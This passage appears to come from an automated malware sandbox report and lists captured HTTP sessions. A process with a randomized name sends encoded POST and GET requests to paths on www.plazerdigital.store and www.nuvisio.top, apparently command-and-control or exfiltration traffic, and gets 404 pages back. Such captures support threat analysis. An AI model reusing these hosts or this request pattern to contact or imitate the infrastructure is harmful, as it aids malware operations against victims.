Nov 2, 2024 05:27:19.664359093 CET	212	IN	Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center;
Nov 2, 2024 05:27:19.664369106 CET	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 43 36 45 42 34 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 Data Ascii: background-color: #3C6EB4; font-size: 1.1em; font-weight: bold; color: #fff; margin: 0; padding: 0.5em; border-bottom: 2px solid #2941
Nov 2, 2024 05:27:19.664374113 CET	1139	IN	Data Raw: 32 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 53 6f 6d 65 74 68 69 6e 67 20 68 61 73 20 74 72 69 67 Data Ascii: 2> <div class="content"> <p>Something has triggered missing webpage on your website. This is the default 404 error page for <strong>nginx</strong> that is distributed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	50030	162.240.81.18	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:21.546464920 CET	10809	OUT	POST /6qe4/ HTTP/1.1 Host: www.plazerdigital.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.plazerdigital.store Referer: http://www.plazerdigital.store/6qe4/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 62 46 69 32 56 30 42 7a 63 68 49 58 65 51 75 6c 4b 55 2b 6e 4c 4b 79 77 52 75 56 4d 78 78 78 44 31 58 4e 6c 6e 79 73 6f 51 38 42 68 43 58 69 65 47 56 43 64 33 61 35 53 75 61 6c 37 4d 78 49 69 68 32 63 43 6c 75 52 4e 37 37 61 50 35 72 45 71 34 77 38 78 50 52 58 71 65 4c 33 55 74 39 42 51 61 41 36 7a 50 31 49 72 31 75 30 76 78 36 6f 47 6c 65 53 50 31 54 49 61 6a 65 70 6c 74 51 6e 57 59 53 4d 36 31 4f 65 4f 4f 36 2f 47 56 66 32 6b 36 6d 7a 50 39 58 36 67 6d 2b 37 77 79 37 65 6e 64 64 72 45 4f 39 7a 38 6f 43 31 33 63 4e 43 73 58 70 4c 70 4e 38 72 31 77 5a 2b 32 63 31 34 77 72 74 52 38 6b 72 56 54 41 4b 48 7a 56 67 75 4c 36 30 57 75 6c 33 68 58 6e 35 56 6b 4d 62 51 42 65 70 77 71 66 38 45 4d 36 4b 78 65 30 45 31 61 5a 33 73 5a 45 44 79 77 32 72 52 49 36 4a 66 75 45 35 32 46 4d 48 42 43 36 6c 55 43 37 6c 42 79 30 77 71 62 78 70 32 35 6e 65 58 78 78 67 7a 79 69 33 32 59 69 6e 6a 30 73 67 67 4c 41 54 53 34 37 30 42 58 6c 4c 4c 6d 55 51 48 31 48 47 77 70 66 2f 6b 42 43 46 2f 47 67 [TRUNCATED] Data Ascii: OrsLbfS8=bFi2V0BzchIXeQulKU+nLKywRuVMxxxD1XNlnysoQ8BhCXieGVCd3a5Sual7MxIih2cCluRN77aP5rEq4w8xPRXqeL3Ut9BQaA6zP1Ir1u0vx6oGleSP1TIajepltQnWYSM61OeOO6/GVf2k6mzP9X6gm+7wy7enddrEO9z8oC13cNCsXpLpN8r1wZ+2c14wrtR8krVTAKHzVguL60Wul3hXn5VkMbQBepwqf8EM6Kxe0E1aZ3sZEDyw2rRI6JfuE52FMHBC6lUC7lBy0wqbxp25neXxxgzyi32Yinj0sggLATS470BXlLLmUQH1HGwpf/kBCF/Ggqyq6ZKXDojqY6QKEh/rP0VGYt7l5Hkh/+tuaCzNOC5hF0MEM+4czVP7SYGLDVmAdbVmymZc4m1UD6uXS0wb6iF65f/69OdZIhFWbNPAu2pRkM6dv93jmTOYtwLZXTGyY696Kq+l8PSF1uDabvCFpfKLeOp4cgsn/eZb810+ktEpMo+i2gcpOAJSHTLHDIgw8bAykuHlConDmFDWMjSXIDYmzQnBIgwEnbD8Ssp5XcuXKL86AtsxyXytexe1QvHHNENLcBC2+sIIBzQY4NlfhQlsyiX/Z/9C8PdxGv2fYzewSVUzs6IbkLuG2P6/OWLCK8KruAdCwcWbz5DBgoQtSsDIRwvVuTJGkl9n/oEo3sQ5vSoiFhpL9JdPwvz7TqbWb7XqWMII9A256JBnZtbGV/XY5gpJPlP8MjhwIwEq8CRJddEZd2i3QPHlwy5TO9gn2crOPtWQxpXFHSkqyeHUPzPTCrvBD2e08R0DeeepSWnE4jY9nkywmuF15atjEHF8ppNZ2L/lAYKxrRfOJDlEy9Je1JdmH0SFrGxgM4DpHFl7XaHOvo83QvYWILZnWxVWadbBjQTWBVLAakUYQ9AU59Z17o6+aJXggKWI8BGaJgjUld2QNlmiw0WrBgDYrS4dW80GK9uLFz9eULm+qXJLFdYuVihFpFaOdUR [TRUNCATED]
Nov 2, 2024 05:27:22.189837933 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sat, 02 Nov 2024 04:27:22 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
Nov 2, 2024 05:27:22.189852953 CET	1236	IN	Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
Nov 2, 2024 05:27:22.189863920 CET	1236	IN	Data Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
Nov 2, 2024 05:27:22.189873934 CET	115	IN	Data Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50031	162.240.81.18	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:24.082772017 CET	440	OUT	GET /6qe4/?OrsLbfS8=WHKWWDhqUQguaHD8HDWaE7qBQd02+h4xtUFy2wcuZe9GFEuUV3KJnOgc+MFlJkMgsX0ap5tq75bc5roy2E0lQwuRPcH9jPJNFRK5EQo5//4rvuULl8WsxSI=&5Js0X=9zex_vxPfbpDzDPp HTTP/1.1 Host: www.plazerdigital.store Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0
Nov 2, 2024 05:27:24.762840033 CET	1236	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sat, 02 Nov 2024 04:27:24 GMT Content-Type: text/html Content-Length: 3650 Connection: close ETag: "663a05b6-e42" Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /<![CDATA[/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #294172; color: #fff; font-weight: norm [TRUNCATED]
Nov 2, 2024 05:27:24.762856960 CET	1236	IN	Data Raw: 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 Data Ascii: border-bottom: 2px solid #000; } h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color:
Nov 2, 2024 05:27:24.762872934 CET	1236	IN	Data Raw: 3c 68 31 3e 3c 73 74 72 6f 6e 67 3e 6e 67 69 6e 78 20 65 72 72 6f 72 21 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: <h1><strong>nginx error!</strong></h1> <div class="content"> <h3>The page you are looking for is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="
Nov 2, 2024 05:27:24.762882948 CET	115	IN	Data Raw: 46 65 64 6f 72 61 20 5d 22 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 38 38 22 20 68 65 69 67 68 74 3d 22 33 31 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 Data Ascii: Fedora ]" width="88" height="31" /></a> </div> </div> </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50032	162.0.211.143	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:30.296415091 CET	683	OUT	POST /mkt0/ HTTP/1.1 Host: www.nuvisio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 205 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.nuvisio.top Referer: http://www.nuvisio.top/mkt0/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 76 75 7a 6c 79 59 75 74 76 39 68 57 70 79 4d 4b 33 39 71 30 41 36 77 67 69 66 42 72 36 6a 33 43 69 66 7a 4d 36 6f 33 50 72 39 76 6e 72 6e 67 30 55 4c 47 68 51 42 46 4f 6f 53 6a 66 4c 76 76 71 7a 70 37 6d 4a 6b 68 4f 33 37 2b 5a 6b 50 2b 46 38 55 58 42 41 46 33 73 76 77 38 57 73 36 32 44 35 54 61 4f 76 36 78 37 74 6d 5a 38 35 71 49 4b 62 56 4c 52 68 59 43 54 33 64 2f 67 68 37 61 48 53 39 74 4a 37 58 69 68 6b 62 4f 4a 61 62 57 72 76 67 68 6c 31 47 52 51 61 4d 53 35 45 51 2b 34 65 52 69 6a 31 4d 58 59 47 2b 34 61 50 41 5a 66 4e 38 4e 72 43 33 73 6b 36 69 54 77 77 49 7a 2f 69 77 3d 3d Data Ascii: OrsLbfS8=vuzlyYutv9hWpyMK39q0A6wgifBr6j3CifzM6o3Pr9vnrng0ULGhQBFOoSjfLvvqzp7mJkhO37+ZkP+F8UXBAF3svw8Ws62D5TaOv6x7tmZ85qIKbVLRhYCT3d/gh7aHS9tJ7XihkbOJabWrvghl1GRQaMS5EQ+4eRij1MXYG+4aPAZfN8NrC3sk6iTwwIz/iw==
Nov 2, 2024 05:27:31.006341934 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:27:30 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50033	162.0.211.143	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:32.835330963 CET	703	OUT	POST /mkt0/ HTTP/1.1 Host: www.nuvisio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 225 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.nuvisio.top Referer: http://www.nuvisio.top/mkt0/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 76 75 7a 6c 79 59 75 74 76 39 68 57 76 54 38 4b 6b 4d 71 30 4c 36 77 6a 74 2f 42 72 76 7a 32 4a 69 59 37 4d 36 74 57 49 72 50 4c 6e 72 46 34 30 56 50 79 68 58 42 46 4f 77 43 6a 57 56 66 75 6d 7a 70 2f 41 4a 6c 74 4f 33 37 36 5a 6b 4b 43 46 38 6e 50 4f 44 31 33 75 78 51 38 44 6f 36 32 44 35 54 61 4f 76 36 4e 42 74 6e 39 38 6c 4b 59 4b 59 30 4c 57 2f 49 43 53 2b 39 2f 67 32 72 61 39 53 39 74 76 37 57 2b 4c 6b 64 53 4a 61 65 71 72 75 78 68 69 2f 47 51 36 65 4d 54 50 49 42 65 33 58 6b 58 52 38 75 54 73 59 63 34 37 48 6d 55 46 63 4e 73 38 51 33 49 58 6e 6c 61 45 39 4c 4f 32 35 31 5a 4e 75 30 43 75 44 4a 38 64 4f 71 69 45 7a 53 7a 79 67 33 49 3d Data Ascii: OrsLbfS8=vuzlyYutv9hWvT8KkMq0L6wjt/Brvz2JiY7M6tWIrPLnrF40VPyhXBFOwCjWVfumzp/AJltO376ZkKCF8nPOD13uxQ8Do62D5TaOv6NBtn98lKYKY0LW/ICS+9/g2ra9S9tv7W+LkdSJaeqruxhi/GQ6eMTPIBe3XkXR8uTsYc47HmUFcNs8Q3IXnlaE9LO251ZNu0CuDJ8dOqiEzSzyg3I=
Nov 2, 2024 05:27:33.506011009 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:27:33 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50034	162.0.211.143	80	2124	C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe

Timestamp	Bytes transferred	Direction	Data
Nov 2, 2024 05:27:35.382606983 CET	10785	OUT	POST /mkt0/ HTTP/1.1 Host: www.nuvisio.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Content-Length: 10305 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Origin: http://www.nuvisio.top Referer: http://www.nuvisio.top/mkt0/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:20.0) Gecko/20100101 Firefox/40.0 Data Raw: 4f 72 73 4c 62 66 53 38 3d 76 75 7a 6c 79 59 75 74 76 39 68 57 76 54 38 4b 6b 4d 71 30 4c 36 77 6a 74 2f 42 72 76 7a 32 4a 69 59 37 4d 36 74 57 49 72 50 44 6e 71 32 77 30 55 6f 75 68 57 42 46 4f 35 69 6a 62 56 66 76 38 7a 74 54 45 4a 6c 78 65 33 35 79 5a 6c 73 32 46 77 47 50 4f 55 6c 33 75 35 77 39 6b 73 36 32 61 35 54 4b 43 76 36 39 42 74 6e 39 38 6c 4d 6b 4b 4f 56 4c 57 39 49 43 54 33 64 2b 68 68 37 62 7a 53 39 30 55 37 57 72 38 6b 72 69 4a 66 4f 61 72 70 48 31 69 7a 47 52 63 54 73 54 48 49 42 54 33 58 69 79 6f 38 76 32 35 59 65 6b 37 44 79 46 4f 41 73 38 35 4c 55 77 6f 79 56 65 73 78 35 69 44 34 46 78 49 2b 42 53 6f 42 5a 6f 72 4d 5a 48 56 70 78 66 48 30 78 47 34 56 36 48 78 46 61 34 6d 6e 55 75 49 2f 74 63 7a 6a 41 33 79 41 4f 71 74 77 34 57 50 69 65 53 7a 42 6d 2f 65 4f 77 43 35 77 6a 36 63 61 50 68 4a 44 46 72 72 47 59 6f 6b 68 6b 45 6a 78 4f 37 70 5a 62 66 59 34 53 79 6d 66 74 42 2b 2b 50 46 34 67 62 54 75 36 69 46 61 32 71 6c 4a 75 2f 73 62 51 73 44 52 71 49 58 79 48 57 70 2b 43 43 78 41 59 [TRUNCATED] Data Ascii: OrsLbfS8=vuzlyYutv9hWvT8KkMq0L6wjt/Brvz2JiY7M6tWIrPDnq2w0UouhWBFO5ijbVfv8ztTEJlxe35yZls2FwGPOUl3u5w9ks62a5TKCv69Btn98lMkKOVLW9ICT3d+hh7bzS90U7Wr8kriJfOarpH1izGRcTsTHIBT3Xiyo8v25Yek7DyFOAs85LUwoyVesx5iD4FxI+BSoBZorMZHVpxfH0xG4V6HxFa4mnUuI/tczjA3yAOqtw4WPieSzBm/eOwC5wj6caPhJDFrrGYokhkEjxO7pZbfY4SymftB++PF4gbTu6iFa2qlJu/sbQsDRqIXyHWp+CCxAYNxPkK8j10Ho7l/3+Xt+On5xXfbVD37FH01jGZdMfdHOGVs4/1TP7jhNLf+MI0EfAuFL/oxwFv+Ijx3dKJcePyTcZxi1bmUnjI1mXKEiUd6V/gczy8L9zG2gxavyEQaxWTG0zjmyPtFnmVUjwbUfTKAd2KQ4Zhlo/jjGD+lxhBrZ5pO2Jdjx9T7YSiD/Su/cIxYuoWhEFYUkbvjQD6B4hoeK7ytxyAuSohFfNaB3sfXrDQyKcdr68U/hvK3/IiGQdkn7jpOci7Z5nJI8GyPtuvSU4dCBFsIDSN3Msxzx19GMsMGDsZfgbJDsbEaGHyQmk753ZNltrIZxwKDbDNTMEmpo6MNqXXdhkucS8E80/gArTsj3PhcKqDt0f8gTcuLbQ09Fqkkgd0uSnUi6+lJyIcengwdXEfXPLwHo2wq2VXBooanqmAC8PVnXqcxE0a1D/IcybSo4ZYi90Z03cBg4zacUQYy1XBYdblL11VNc3vnp1aSP2/3R23kKuDpxEYi0wOI6ZgskxZQX0+5gOpUAWFGnMsdq/xjHZi5dB2njTSdP7LlYaVKUwm8TmI80NDT3NsvvzXkuHh7q3ZwmIRqSUvk5hefw3JeTQf3DcPcwuZl8ghiYKf/urd+npsMduNDekSHsshUAFG+GZs9odKXkvvA5Y83LBYXqSbc [TRUNCATED]
Nov 2, 2024 05:27:36.077708960 CET	533	IN	HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 04:27:35 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 